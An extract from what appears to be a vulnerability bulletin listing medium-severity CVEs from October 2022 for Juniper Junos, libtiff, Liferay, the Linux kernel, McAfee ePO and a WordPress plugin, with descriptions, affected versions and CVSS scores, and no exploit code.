juniper — junos In VxLAN scenarios on EX4300-MP, EX4600, QFX5000 Series devices an Uncontrolled Memory Allocation vulnerability in the Packet Forwarding Engine (PFE) of Juniper Networks Junos OS allows an unauthenticated adjacently located attacker sending specific packets to cause a Denial of Service (DoS) condition by crashing one or more PFEs when they are received and processed by the device. Upon automatic restart of the PFE, continued processing of these packets will cause the memory leak to reappear. Depending on the volume of packets received the attacker may be able to create a sustained Denial of Service (DoS) condition. This issue affects: Juniper Networks Junos OS on EX4300-MP, EX4600, QFX5000 Series: 17.1 version 17.1R1 and later versions prior to 17.3R3-S12; 17.4 versions prior to 17.4R2-S13, 17.4R3-S5; 18.1 versions prior to 18.1R3-S13; 18.2 versions prior to 18.2R3-S8; 18.3 versions prior to 18.3R3-S5; 18.4 versions prior to 18.4R1-S8, 18.4R2-S6, 18.4R3-S6; 19.1 versions prior to 19.1R3-S4; 19.2 versions prior to 19.2R1-S7, 19.2R3-S1; 19.3 versions prior to 19.3R2-S6, 19.3R3-S1; 19.4 versions prior to 19.4R1-S4, 19.4R2-S4, 19.4R3-S1; 20.1 versions prior to 20.1R2; 20.2 versions prior to 20.2R2-S3, 20.2R3; 20.3 versions prior to 20.3R2. This issue does not affect Junos OS versions prior to 17.1R1. 2022-10-18 6.5 CVE-2022-22226
CONFIRM
MISC
juniper — junos An Improper Input Validation vulnerability in the Routing Protocol Daemon (rpd) of Juniper Networks Junos OS and Junos OS Evolved allows an adjacent unauthenticated attacker to cause DoS (Denial of Service). If another router generates more than one specific valid OSPFv3 LSA then rpd will crash while processing these LSAs. This issue only affects systems configured with OSPFv3, while OSPFv2 is not affected. This issue affects: Juniper Networks Junos OS 19.2 versions prior to 19.2R3-S6; 19.3 version 19.3R2 and later versions; 19.4 versions prior to 19.4R2-S8, 19.4R3-S9; 20.1 version 20.1R1 and later versions; 20.2 versions prior to 20.2R3-S5; 20.3 versions prior to 20.3R3-S5; 20.4 versions prior to 20.4R3-S4; 21.1 versions prior to 21.1R3-S2; 21.2 versions prior to 21.2R3-S1; 21.3 versions prior to 21.3R3-S2; 21.4 versions prior to 21.4R2. Juniper Networks Junos OS Evolved All versions prior to 20.4R3-S5-EVO; 21.1-EVO versions prior to 21.1R3-S2-EVO; 21.2-EVO versions prior to 21.2R3-S1-EVO; 21.3-EVO versions prior to 21.3R3-S2-EVO; 21.4-EVO versions prior to 21.4R2-EVO; 22.1-EVO versions prior to 22.1R2-EVO; 22.2-EVO versions prior to 22.2R2-EVO. This issue does not affect Juniper Networks Junos OS 19.2 versions prior to 19.2R2. 2022-10-18 6.5 CVE-2022-22230
CONFIRM
juniper — junos An Improper Authentication vulnerability in the kernel of Juniper Networks Junos OS allows an unauthenticated, network-based attacker to cause an impact on confidentiality or integrity. A vulnerability in the processing of TCP-AO will allow a BGP or LDP peer not configured with authentication to establish a session even if the peer is locally configured to use authentication. This could lead to untrusted or unauthorized sessions being established. This issue affects Juniper Networks Junos OS: 21.2 versions prior to 21.2R3-S1; 21.3 versions prior to 21.3R2-S2, 21.3R3; 21.4 versions prior to 21.4R2-S1, 21.4R3; 22.1 versions prior to 22.1R1-S1, 22.1R2. This issue does not affect Juniper Networks Junos OS Evolved. 2022-10-18 6.5 CVE-2022-22237
CONFIRM
juniper — junos An Improper Check for Unusual or Exceptional Conditions vulnerability in the routing protocol daemon (rpd) of Juniper Networks Junos OS and Junos OS Evolved allows an unauthenticated, adjacent attacker to cause a Denial of Service (DoS). When an incoming RESV message corresponding to a protected LSP is malformed it causes an incorrect internal state resulting in an rpd core. This issue affects: Juniper Networks Junos OS All versions prior to 19.2R3-S6; 19.3 versions prior to 19.3R3-S6; 19.4 versions prior to 19.4R3-S8; 20.1 versions prior to 20.1R3-S2; 20.2 versions prior to 20.2R3-S3; 20.3 versions prior to 20.3R3-S2; 20.4 versions prior to 20.4R3-S1; 21.1 versions prior to 21.1R3; 21.2 versions prior to 21.2R1-S2, 21.2R3; 21.3 versions prior to 21.3R2. Juniper Networks Junos OS Evolved All versions prior to 20.2R3-S3-EVO; 20.3-EVO version 20.3R1-EVO and later versions; 20.4-EVO versions prior to 20.4R3-S1-EVO; 21.1-EVO version 21.1R1-EVO and later versions; 21.2-EVO version 21.2R1-EVO and later versions; 21.3-EVO versions prior to 21.3R2-EVO. 2022-10-18 6.5 CVE-2022-22238
CONFIRM
juniper — junos An Improper Control of a Resource Through its Lifetime vulnerability in the Packet Forwarding Engine (PFE) of Juniper Networks Junos OS on MX Series allows an unauthenticated adjacent attacker to cause a Denial of Service (DoS). When there is a continuous mac move a memory corruption causes one or more FPCs to crash and reboot. These MAC moves can be between two local interfaces or between core/EVPN and local interface. The below error logs can be seen in PFE syslog when this issue happens: xss_event_handler(1071): EA[0:0]_PPE 46.xss[0] ADDR Error. ppe_error_interrupt(4298): EA[0:0]_PPE 46 Errors sync xtxn error xss_event_handler(1071): EA[0:0]_PPE 1.xss[0] ADDR Error. ppe_error_interrupt(4298): EA[0:0]_PPE 1 Errors sync xtxn error xss_event_handler(1071): EA[0:0]_PPE 2.xss[0] ADDR Error. This issue affects Juniper Networks Junos OS on MX Series: All versions prior to 15.1R7-S13; 19.1 versions prior to 19.1R3-S9; 19.2 versions prior to 19.2R3-S6; 19.3 versions prior to 19.3R3-S6; 19.4 versions prior to 19.4R2-S7, 19.4R3-S8; 20.1 version 20.1R1 and later versions; 20.2 versions prior to 20.2R3-S5; 20.3 versions prior to 20.3R3-S5; 20.4 versions prior to 20.4R3-S2; 21.1 versions prior to 21.1R3; 21.2 versions prior to 21.2R3; 21.3 versions prior to 21.3R2. 2022-10-18 6.5 CVE-2022-22249
CONFIRM
juniper — junos An Improper Control of a Resource Through its Lifetime vulnerability in the Packet Forwarding Engine (PFE) of Juniper Networks Junos OS and Junos OS Evolved allows an unauthenticated adjacent attacker to cause a Denial of Service (DoS). In an EVPN-MPLS scenario, if a MAC is learned locally on an access interface but later a request to delete is received indicating that the MAC was learnt remotely, this can lead to memory corruption which can result in line card crash and reload. This issue affects: Juniper Networks Junos OS All versions 17.3R1 and later versions prior to 19.2R3-S5; 19.3 versions prior to 19.3R3-S5; 19.4 versions prior to 19.4R2-S6, 19.4R3-S8; 20.1 version 20.1R1 and later versions; 20.2 versions prior to 20.2R3-S4; 20.3 versions prior to 20.3R3-S3; 20.4 versions prior to 20.4R3-S3; 21.1 versions prior to 21.1R3-S1; 21.2 versions prior to 21.2R3; 21.3 versions prior to 21.3R2; 21.4 versions prior to 21.4R1-S1, 21.4R2. Juniper Networks Junos OS Evolved All versions prior to 20.4R3-S3-EVO; 21.1-EVO version 21.1R1-EVO and later versions; 21.2-EVO versions prior to 21.2R3-EVO; 21.3-EVO versions prior to 21.3R2-EVO; 21.4-EVO versions prior to 21.4R1-S1-EVO, 21.4R2-EVO. This issue does not affect Juniper Networks Junos OS versions prior to 17.3R1. 2022-10-18 6.5 CVE-2022-22250
CONFIRM
juniper — junos A Cross-site Scripting (XSS) vulnerability in the J-Web component of Juniper Networks Junos OS allows an unauthenticated attacker to run malicious scripts reflected off of J-Web to the victim’s browser in the context of their session within J-Web. This issue affects Juniper Networks Junos OS all versions prior to 19.1R3-S9; 19.2 versions prior to 19.2R3-S6; 19.3 versions prior to 19.3R3-S7; 19.4 versions prior to 19.4R2-S7, 19.4R3-S8; 20.1 versions prior to 20.1R3-S5; 20.2 versions prior to 20.2R3-S5; 20.3 versions prior to 20.3R3-S5; 20.4 versions prior to 20.4R3-S4; 21.1 versions prior to 21.1R3-S4; 21.2 versions prior to 21.2R3-S1; 21.3 versions prior to 21.3R3; 21.4 versions prior to 21.4R2; 22.1 versions prior to 22.1R2. 2022-10-18 6.1 CVE-2022-22242
CONFIRM
juniper — junos A Use After Free vulnerability in the Routing Protocol Daemon (rpd) of Juniper Networks Junos OS and Junos OS Evolved allows an unauthenticated network-based attacker to cause Denial of Service (DoS). When a BGP session flap happens, a Use After Free of a memory location that was assigned to another object can occur, which will lead to an rpd crash. This is a race condition that is outside of the attacker’s control and cannot be deterministically exploited. Continued flapping of BGP sessions can create a sustained Denial of Service (DoS) condition. This issue affects Juniper Networks Junos OS: All versions prior to 18.4R2-S9, 18.4R3-S11; 19.1 versions prior to 19.1R3-S8; 19.2 version 19.2R1 and later versions; 19.3 versions prior to 19.3R3-S5; 19.4 versions prior to 19.4R2-S6, 19.4R3-S6; 20.1 version 20.1R1 and later versions; 20.2 versions prior to 20.2R3-S3; 20.3 versions prior to 20.3R3-S2; 20.4 versions prior to 20.4R3-S1; 21.1 versions prior to 21.1R3-S3; 21.2 versions prior to 21.2R2-S1, 21.2R3. Juniper Networks Junos OS Evolved All versions prior to 20.4R3-S4-EVO; 21.1-EVO versions prior to 21.1R3-S2-EVO; 21.2-EVO versions prior to 21.2R3-EVO; 21.3-EVO versions prior to 21.3R2-EVO. 2022-10-18 5.9 CVE-2022-22208
CONFIRM
juniper — junos Due to the Improper Handling of an Unexpected Data Type in the processing of EVPN routes on Juniper Networks Junos OS and Junos OS Evolved, an attacker in direct control of a BGP client connected to a route reflector, or via a machine in the middle (MITM) attack, can send a specific EVPN route contained within a BGP Update, triggering a routing protocol daemon (RPD) crash, leading to a Denial of Service (DoS) condition. Continued receipt and processing of these specific EVPN routes could create a sustained Denial of Service (DoS) condition. This issue only occurs on BGP route reflectors, only within a BGP EVPN multicast environment, and only when one or more BGP clients have ‘leave-sync-route-oldstyle’ enabled. This issue affects: Juniper Networks Junos OS 21.3 versions prior to 21.3R3-S2; 21.4 versions prior to 21.4R2-S2, 21.4R3; 22.1 versions prior to 22.1R1-S2, 22.1R3; 22.2 versions prior to 22.2R2. Juniper Networks Junos OS Evolved 21.3 version 21.3R1-EVO and later versions prior to 21.4R3-EVO; 22.1 versions prior to 22.1R1-S2-EVO, 22.1R3-EVO; 22.2 versions prior to 22.2R2-EVO. This issue does not affect: Juniper Networks Junos OS versions prior to 21.3R1. Juniper Networks Junos OS Evolved versions prior to 21.3R1-EVO. 2022-10-18 5.9 CVE-2022-22219
CONFIRM
MISC
juniper — junos A Time-of-check Time-of-use (TOCTOU) Race Condition vulnerability in the Routing Protocol Daemon (rpd) of Juniper Networks Junos OS and Junos OS Evolved allows a network-based unauthenticated attacker to cause a Denial of Service (DoS). When a BGP flow route with redirect IP extended community is received, and the reachability to the next-hop of the corresponding redirect IP is flapping, the rpd process might crash. Whether the crash occurs depends on the timing of the internal processing of these two events and is outside the attacker’s control. Please note that this issue also affects Route-Reflectors unless ‘routing-options flow firewall-install-disable’ is configured. This issue affects: Juniper Networks Junos OS: 18.4 versions prior to 18.4R2-S10, 18.4R3-S10; 19.1 versions prior to 19.1R3-S7; 19.2 versions prior to 19.2R1-S8, 19.2R3-S4; 19.4 versions prior to 19.4R3-S8; 20.2 versions prior to 20.2R3-S3; 20.3 versions prior to 20.3R3-S2; 20.4 versions prior to 20.4R3; 21.1 versions prior to 21.1R2. Juniper Networks Junos OS Evolved: All versions prior to 20.4R2-EVO; 21.1-EVO versions prior to 21.1R2-EVO. This issue does not affect Juniper Networks Junos OS versions prior to 18.4R1. 2022-10-18 5.9 CVE-2022-22220
CONFIRM
juniper — junos A Time-of-check Time-of-use (TOCTOU) Race Condition vulnerability in the Routing Protocol Daemon (rpd) of Juniper Networks Junos OS and Junos OS Evolved allows an unauthenticated attacker with an established BGP session to cause a Denial of Service (DoS). In a BGP multipath scenario, when one of the contributing routes is flapping often and rapidly, rpd may crash. As this crash depends on whether a route is a contributing route, and on the internal timing of the events triggered by the flap this vulnerability is outside the direct control of a potential attacker. This issue affects: Juniper Networks Junos OS 19.2 versions prior to 19.2R3-S6; 20.2 versions prior to 20.2R3-S4; 20.3 versions prior to 20.3R3-S3; 20.4 versions prior to 20.4R3-S4; 21.1 versions prior to 21.1R3; 21.2 versions prior to 21.2R2; 21.3 versions prior to 21.3R2. Juniper Networks Junos OS Evolved All versions prior to 20.4R3-S4-EVO; 21.1-EVO version 21.1R1-EVO and later versions; 21.2-EVO versions prior to 21.2R2-EVO; 21.3-EVO versions prior to 21.3R2-EVO. This issue does not affect: Juniper Networks Junos OS versions 19.2 versions prior to 19.2R2, 19.3R1 and above prior to 20.2R1. Juniper Networks Junos OS Evolved versions prior to 20.2R1-EVO. 2022-10-18 5.9 CVE-2022-22225
CONFIRM
juniper — junos An Unchecked Return Value to NULL Pointer Dereference vulnerability in Routing Protocol Daemon (rpd) of Juniper Networks Junos OS and Junos OS Evolved allows a locally authenticated attacker with low privileges to cause a Denial of Service (DoS). In Segment Routing (SR) to Label Distribution Protocol (LDP) interworking scenario, configured with Segment Routing Mapping Server (SRMS) at any node, when an Area Border Router (ABR) leaks the SRMS entries having “S” flag set from IS-IS Level 2 to Level 1, an rpd core might be observed when a specific low privileged CLI command is issued. This issue affects: Juniper Networks Junos OS 21.4 versions prior to 21.4R1-S2, 21.4R2-S1, 21.4R3; 22.1 versions prior to 22.1R2. Juniper Networks Junos OS Evolved 21.4-EVO versions prior to 21.4R1-S2-EVO, 21.4R2-S1-EVO, 21.4R3-EVO; 22.1-EVO versions prior to 22.1R2-EVO. This issue does not affect: Juniper Networks Junos OS versions prior to 21.4R1. Juniper Networks Junos OS Evolved versions prior to 21.4R1-EVO. 2022-10-18 5.5 CVE-2022-22233
CONFIRM
juniper — junos An Improper Preservation of Consistency Between Independent Representations of Shared State vulnerability in the Packet Forwarding Engine (PFE) of Juniper Networks Junos OS allows a locally authenticated attacker with low privileges to cause a Denial of Service (DoS). If the device is very busy, for example while executing a series of show commands on the CLI, one or more SFPs might no longer be detected. The system then changes its state to “unplugged”, which leads to traffic impact and at least a partial DoS. Once the system is less busy the port states return to their actual value. Indicators of compromise are log messages about unplugged SFPs and corresponding syspld messages without any physical or environmental cause. These can be checked by issuing the following commands: user@device# show log messages | match unplugged %PFE-6: fpc0 sfp-0/1/2 SFP unplugged %PFE-6: fpc0 sfp-0/1/3 SFP unplugged The following log messages will also be seen when this issue happens: fpc0 Error tvp_drv_syspld_read: syspld read failed for address <address> fpc0 Error[-1]:tvp_optics_presence_get – Syspld read failed for port <pic/port> fpc0 optics pres failed(-1) for pic <pic> port <port> fpc0 tvp_drv_syspld_read: i2c access retry count 200 This issue affects Juniper Networks Junos OS on EX2300 Series, EX3400 Series: All versions prior to 18.4R3-S11; 19.1 versions prior to 19.1R3-S9; 19.2 versions prior to 19.2R1-S9, 19.2R3-S5; 19.3 versions prior to 19.3R3-S6; 19.4 versions prior to 19.4R2-S7, 19.4R3-S8; 20.1 versions prior to 20.1R3-S4; 20.2 versions prior to 20.2R3-S4; 20.3 versions prior to 20.3R3-S4; 20.4 versions prior to 20.4R3-S3; 21.1 versions prior to 21.1R3-S1; 21.2 versions prior to 21.2R3; 21.3 versions prior to 21.3R2; 21.4 versions prior to 21.4R2. 2022-10-18 5.5 CVE-2022-22234
CONFIRM
juniper — junos An Allocation of Resources Without Limits or Throttling and a Missing Release of Memory after Effective Lifetime vulnerability in the routing protocol daemon (rpd) of Juniper Networks Junos OS and Junos OS Evolved allows a locally authenticated low privileged attacker to cause a Denial of Service (DoS). In a high-scaled BGP routing environment with rib-sharding enabled, two issues may occur when executing a specific CLI command. One is a memory leak issue with rpd where the leak rate is not constant, and the other is a temporary spike in rpd memory usage during command execution. This issue affects: Juniper Networks Junos OS 19.4 versions prior to 19.4R3-S9; 20.2 versions prior to 20.2R3-S5; 20.3 versions prior to 20.3R3-S2; 20.4 versions prior to 20.4R3-S1; 21.1 versions prior to 21.1R3; 21.2 versions prior to 21.2R1-S2, 21.2R2-S1, 21.2R3; 21.3 versions prior to 21.3R2. Juniper Networks Junos OS Evolved All versions prior to 20.4R3-S1-EVO; 21.1-EVO version 21.1R1-EVO and later versions; 21.2-EVO versions prior to 21.2R1-S2-EVO, 21.2R3-EVO; 21.3-EVO versions prior to 21.3R2-EVO. This issue does not affect Juniper Networks Junos OS versions prior to 19.2R1. 2022-10-18 5.5 CVE-2022-22240
CONFIRM
juniper — junos An XPath Injection vulnerability in the J-Web component of Juniper Networks Junos OS allows an unauthenticated attacker sending a crafted POST to reach the XPath channel, which may allow chaining to other unspecified vulnerabilities, leading to a partial loss of confidentiality. This issue affects Juniper Networks Junos OS: all versions prior to 19.1R3-S9; 19.2 versions prior to 19.2R3-S6; 19.3 versions prior to 19.3R3-S7; 19.4 versions prior to 19.4R3-S9; 20.1 versions prior to 20.1R3-S5; 20.2 versions prior to 20.2R3-S5; 20.3 versions prior to 20.3R3-S5; 20.4 versions prior to 20.4R3-S4; 21.1 versions prior to 21.1R3-S3; 21.2 versions prior to 21.2R3-S1; 21.3 versions prior to 21.3R3; 21.4 versions prior to 21.4R1-S2, 21.4R2; 22.1 versions prior to 22.1R1-S1, 22.1R2. 2022-10-18 5.3 CVE-2022-22244
CONFIRM
juniper — junos An XPath Injection vulnerability due to Improper Input Validation in the J-Web component of Juniper Networks Junos OS allows an authenticated attacker to add an XPath command to the XPath stream, which may allow chaining to other unspecified vulnerabilities, leading to a partial loss of confidentiality. This issue affects Juniper Networks Junos OS: all versions prior to 19.1R3-S9; 19.2 versions prior to 19.2R3-S6; 19.3 versions prior to 19.3R3-S7; 19.4 versions prior to 19.4R2-S7, 19.4R3-S8; 20.1 versions prior to 20.1R3-S5; 20.2 versions prior to 20.2R3-S5; 20.3 versions prior to 20.3R3-S5; 20.4 versions prior to 20.4R3-S4; 21.1 versions prior to 21.1R3-S2; 21.2 versions prior to 21.2R3-S1; 21.3 versions prior to 21.3R2-S2, 21.3R3; 21.4 versions prior to 21.4R1-S2, 21.4R2-S1, 21.4R3; 22.1 versions prior to 22.1R1-S1, 22.1R2. 2022-10-18 4.3 CVE-2022-22243
CONFIRM
juniper — junos A Path Traversal vulnerability in the J-Web component of Juniper Networks Junos OS allows an authenticated attacker to upload arbitrary files to the device by bypassing validation checks built into Junos OS. The attacker should not be able to execute the file due to validation checks built into Junos OS. Successful exploitation of this vulnerability could lead to loss of filesystem integrity. This issue affects Juniper Networks Junos OS: all versions prior to 19.1R3-S9; 19.2 versions prior to 19.2R3-S6; 19.3 versions prior to 19.3R3-S7; 19.4 versions prior to 19.4R3-S9; 20.1 versions prior to 20.1R3-S5; 20.2 versions prior to 20.2R3-S5; 20.3 versions prior to 20.3R3-S5; 20.4 versions prior to 20.4R3-S4; 21.1 versions prior to 21.1R3-S2; 21.2 versions prior to 21.2R3-S1; 21.3 versions prior to 21.3R2-S2, 21.3R3; 21.4 versions prior to 21.4R1-S2, 21.4R2-S1, 21.4R3; 22.1 versions prior to 22.1R1-S1, 22.1R2. 2022-10-18 4.3 CVE-2022-22245
CONFIRM
juniper — junos_os_evolved An Improper Check for Unusual or Exceptional Conditions vulnerability in the Packet Forwarding Engine (PFE) of Juniper Networks Junos OS Evolved on ACX7000 Series allows an unauthenticated network-based attacker to cause a partial Denial of Service (DoS). On receipt of specific IPv6 transit traffic, Junos OS Evolved on ACX7100-48L, ACX7100-32C and ACX7509 sends this traffic to the Routing Engine (RE) instead of forwarding it, leading to increased CPU utilization of the RE and a partial DoS. This issue only affects systems configured with IPv6. This issue does not affect ACX7024 which is supported from 22.3R1-EVO onwards where the fix has already been incorporated as indicated in the solution section. This issue affects Juniper Networks Junos OS Evolved on ACX7100-48L, ACX7100-32C, ACX7509: 21.1-EVO versions prior to 21.1R3-S2-EVO; 21.2-EVO versions prior to 21.2R3-S2-EVO; 21.3-EVO versions prior to 21.3R3-EVO; 21.4-EVO versions prior to 21.4R1-S1-EVO, 21.4R2-EVO. This issue does not affect Juniper Networks Junos OS Evolved versions prior to 21.1R1-EVO. 2022-10-18 5.3 CVE-2022-22227
CONFIRM
keking — kkfileview kkFileView 4.0 is vulnerable to Cross Site Scripting (XSS) via controller Filecontroller.java. 2022-10-17 6.1 CVE-2022-42147
MISC
libtiff — libtiff LibTIFF 4.4.0 has an out-of-bounds write in _TIFFmemcpy in libtiff/tif_unix.c:346 when called from extractImageSection, tools/tiffcrop.c:6826, allowing attackers to cause a denial-of-service via a crafted tiff file. For users that compile libtiff from sources, the fix is available with commit 236b7191. 2022-10-21 6.5 CVE-2022-3597
MISC
MISC
CONFIRM
libtiff — libtiff LibTIFF 4.4.0 has an out-of-bounds write in extractContigSamplesShifted24bits in tools/tiffcrop.c:3604, allowing attackers to cause a denial-of-service via a crafted tiff file. For users that compile libtiff from sources, the fix is available with commit cfbb883b. 2022-10-21 6.5 CVE-2022-3598
CONFIRM
MISC
MISC
libtiff — libtiff LibTIFF 4.4.0 has an out-of-bounds read in writeSingleSection in tools/tiffcrop.c:7345, allowing attackers to cause a denial-of-service via a crafted tiff file. For users that compile libtiff from sources, the fix is available with commit e8131125. 2022-10-21 6.5 CVE-2022-3599
MISC
MISC
CONFIRM
libtiff — libtiff LibTIFF 4.4.0 has an out-of-bounds write in _TIFFmemset in libtiff/tif_unix.c:340 when called from processCropSelections, tools/tiffcrop.c:7619, allowing attackers to cause a denial-of-service via a crafted tiff file. For users that compile libtiff from sources, the fix is available with commit 236b7191. 2022-10-21 6.5 CVE-2022-3626
CONFIRM
MISC
MISC
libtiff — libtiff LibTIFF 4.4.0 has an out-of-bounds write in _TIFFmemcpy in libtiff/tif_unix.c:346 when called from extractImageSection, tools/tiffcrop.c:6860, allowing attackers to cause a denial-of-service via a crafted tiff file. For users that compile libtiff from sources, the fix is available with commit 236b7191. 2022-10-21 6.5 CVE-2022-3627
MISC
MISC
CONFIRM
liferay — dxp A Cross-site scripting (XSS) vulnerability in Document Library module in Liferay Portal 7.4.3.30 through 7.4.3.36, and Liferay DXP 7.4 update 30 through update 36 allows remote attackers to inject arbitrary web script or HTML via the `redirect` parameter. 2022-10-18 6.1 CVE-2022-42113
MISC
MISC
liferay — dxp A Cross-site scripting (XSS) vulnerability in the Frontend Editor module’s integration with CKEditor in Liferay Portal 7.3.2 through 7.4.3.14, and Liferay DXP 7.3 before update 6, and 7.4 before update 15 allows remote attackers to inject arbitrary web script or HTML via the (1) name, or (2) namespace parameter. 2022-10-18 6.1 CVE-2022-42116
MISC
MISC
liferay — dxp A Cross-site scripting (XSS) vulnerability in the Frontend Taglib module in Liferay Portal 7.3.2 through 7.4.3.16, and Liferay DXP 7.3 before update 6, and 7.4 before update 17 allows remote attackers to inject arbitrary web script or HTML. 2022-10-18 6.1 CVE-2022-42117
MISC
MISC
liferay — dxp A Cross-site scripting (XSS) vulnerability in the Document and Media module – file upload functionality in Liferay Digital Experience Platform 7.3.10 SP3 allows remote attackers to inject arbitrary JS script or HTML into the description field of an uploaded SVG file. 2022-10-19 5.4 CVE-2022-38901
MISC
MISC
MISC
liferay — dxp A Cross-site scripting (XSS) vulnerability in the Portal Search module’s Sort widget in Liferay Portal 7.2.0 through 7.4.3.24, and Liferay DXP 7.2 before fix pack 19, 7.3 before update 5, and DXP 7.4 before update 25 allows remote attackers to inject arbitrary web script or HTML via a crafted payload. 2022-10-18 5.4 CVE-2022-42112
MISC
MISC
liferay — dxp A Cross-site scripting (XSS) vulnerability in the Role module’s edit role assignees page in Liferay Portal 7.4.0 through 7.4.3.36, and Liferay DXP 7.4 before update 37 allows remote attackers to inject arbitrary web script or HTML. 2022-10-18 5.4 CVE-2022-42114
MISC
MISC
liferay — liferay_portal Cross-site scripting (XSS) vulnerability in the Object module’s edit object details page in Liferay Portal 7.4.3.4 through 7.4.3.36 allows remote attackers to inject arbitrary web script or HTML via a crafted payload injected into the object field’s `Label` text field. 2022-10-18 5.4 CVE-2022-42115
MISC
MISC
linux — linux_kernel A vulnerability was found in Linux Kernel. It has been classified as problematic. This affects the function get_syms of the file tools/testing/selftests/bpf/prog_tests/kprobe_multi_test.c of the component BPF. The manipulation leads to memory leak. It is recommended to apply a patch to fix this issue. The identifier VDB-211029 was assigned to this vulnerability. 2022-10-17 5.7 CVE-2022-3531
N/A
N/A
linux — linux_kernel A vulnerability was found in Linux Kernel. It has been declared as problematic. This vulnerability affects the function test_map_kptr_success/test_fentry of the component BPF. The manipulation leads to memory leak. It is recommended to apply a patch to fix this issue. VDB-211030 is the identifier assigned to this vulnerability. 2022-10-17 5.7 CVE-2022-3532
N/A
N/A
linux — linux_kernel A vulnerability was found in Linux Kernel. It has been rated as problematic. This issue affects the function parse_usdt_arg of the file tools/lib/bpf/usdt.c of the component BPF. The manipulation of the argument reg_name leads to memory leak. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-211031. 2022-10-17 5.7 CVE-2022-3533
N/A
N/A
linux — linux_kernel A vulnerability classified as problematic has been found in Linux Kernel. Affected is the function read_50_controller_cap_complete of the file tools/mgmt-tester.c of the component BlueZ. The manipulation of the argument cap_len leads to null pointer dereference. It is recommended to apply a patch to fix this issue. VDB-211086 is the identifier assigned to this vulnerability. 2022-10-17 5.7 CVE-2022-3563
MISC
MISC
linux — linux_kernel A vulnerability classified as problematic was found in Linux Kernel. This vulnerability affects the function bnx2x_tpa_stop of the file drivers/net/ethernet/broadcom/bnx2x/bnx2x_cmn.c of the component BPF. The manipulation leads to memory leak. It is recommended to apply a patch to fix this issue. VDB-211042 is the identifier assigned to this vulnerability. 2022-10-17 5.5 CVE-2022-3542
N/A
N/A
linux — linux_kernel A vulnerability, which was classified as problematic, has been found in Linux Kernel. This issue affects the function unix_sock_destructor/unix_release_sock of the file net/unix/af_unix.c of the component BPF. The manipulation leads to memory leak. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-211043. 2022-10-17 5.5 CVE-2022-3543
N/A
N/A
linux — linux_kernel A vulnerability, which was classified as problematic, was found in Linux Kernel. Affected is the function damon_sysfs_add_target of the file mm/damon/sysfs.c of the component Netfilter. The manipulation leads to memory leak. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-211044. 2022-10-17 5.5 CVE-2022-3544
N/A
N/A
linux — linux_kernel A flaw was found in the Linux kernel’s networking code. A use-after-free was found in the way the sch_sfb enqueue function used the socket buffer (SKB) cb field after the same SKB had been enqueued (and freed) into a child qdisc. This flaw allows a local, unprivileged user to crash the system, causing a denial of service. 2022-10-19 5.5 CVE-2022-3586
MISC
MISC
linux — linux_kernel A vulnerability was found in Linux Kernel. It has been classified as problematic. Affected is the function mptcp_limit_get_set of the file ip/ipmptcp.c of the component iproute2. The manipulation leads to memory leak. It is possible to launch the attack remotely. It is recommended to apply a patch to fix this issue. VDB-211362 is the identifier assigned to this vulnerability. 2022-10-18 5.5 CVE-2022-3593
N/A
N/A
linux — linux_kernel A vulnerability was found in Linux Kernel. It has been rated as problematic. Affected by this issue is the function sess_free_buffer of the file fs/cifs/sess.c of the component CIFS Handler. The manipulation leads to double free. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-211364. 2022-10-18 5.5 CVE-2022-3595
N/A
N/A
linux — linux_kernel A vulnerability was found in Linux Kernel. It has been classified as problematic. This affects the function find_prog_by_sec_insn of the file tools/lib/bpf/libbpf.c of the component BPF. The manipulation leads to null pointer dereference. It is recommended to apply a patch to fix this issue. The identifier VDB-211749 was assigned to this vulnerability. 2022-10-19 5.5 CVE-2022-3606
N/A
N/A
linux — linux_kernel A vulnerability has been found in Linux Kernel and classified as problematic. This vulnerability affects the function jlink_init of the file monitor/jlink.c of the component BlueZ. The manipulation leads to denial of service. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-211936. 2022-10-21 5.5 CVE-2022-3637
N/A
N/A
linux — linux_kernel A list management bug in BSS handling in the mac80211 stack in the Linux kernel 5.1 through 5.19.x before 5.19.16 could be used by local attackers (able to inject WLAN frames) to corrupt a linked list and, in turn, potentially execute code. 2022-10-14 5.5 CVE-2022-42721
MISC
MISC
MISC
FEDORA
FEDORA
FEDORA
DEBIAN
linux — linux_kernel In the Linux kernel 5.8 through 5.19.x before 5.19.16, local attackers able to inject WLAN frames into the mac80211 stack could cause a NULL pointer dereference denial-of-service attack against the beacon protection of P2P devices. 2022-10-14 5.5 CVE-2022-42722
MISC
MISC
MISC
FEDORA
FEDORA
FEDORA
DEBIAN
linux — linux_kernel A vulnerability was found in Linux Kernel. It has been classified as problematic. Affected is an unknown function of the file mm/memory.c of the component Driver Handler. The manipulation leads to use after free. It is possible to launch the attack remotely. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-211020. 2022-10-16 5.3 CVE-2022-3523
MISC
MISC
linux — linux_kernel A vulnerability has been found in Linux Kernel and classified as problematic. This vulnerability affects the function l2cap_recv_acldata of the file net/bluetooth/l2cap_core.c of the component Bluetooth. The manipulation leads to memory leak. It is recommended to apply a patch to fix this issue. VDB-211918 is the identifier assigned to this vulnerability. 2022-10-20 4.3 CVE-2022-3619
N/A
N/A
mcafee — epolicy_orchestrator A reflected cross-site scripting (XSS) vulnerability in ePO prior to 5.10 Update 14 allows a remote unauthenticated attacker to potentially obtain access to an ePO administrator’s session by convincing the authenticated ePO administrator to click on a carefully crafted link. This would lead to limited access to sensitive information and limited ability to alter some information in ePO. 2022-10-18 6.1 CVE-2022-3339
CONFIRM
mcafee — epolicy_orchestrator An External XML entity (XXE) vulnerability in ePO prior to 5.10 Update 14 can allow an unauthenticated remote attacker to potentially trigger a Server Side Request Forgery attack. This can be exploited by mimicking the Agent Handler call to ePO and passing the carefully constructed XML file through the API. 2022-10-18 5.4 CVE-2022-3338
CONFIRM
mekshq — meks_easy_social_share The Meks Easy Social Share WordPress plugin before 1.2.8 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in a multisite setup). 2022-10-17 4.8 CVE-2022-2574
MISC
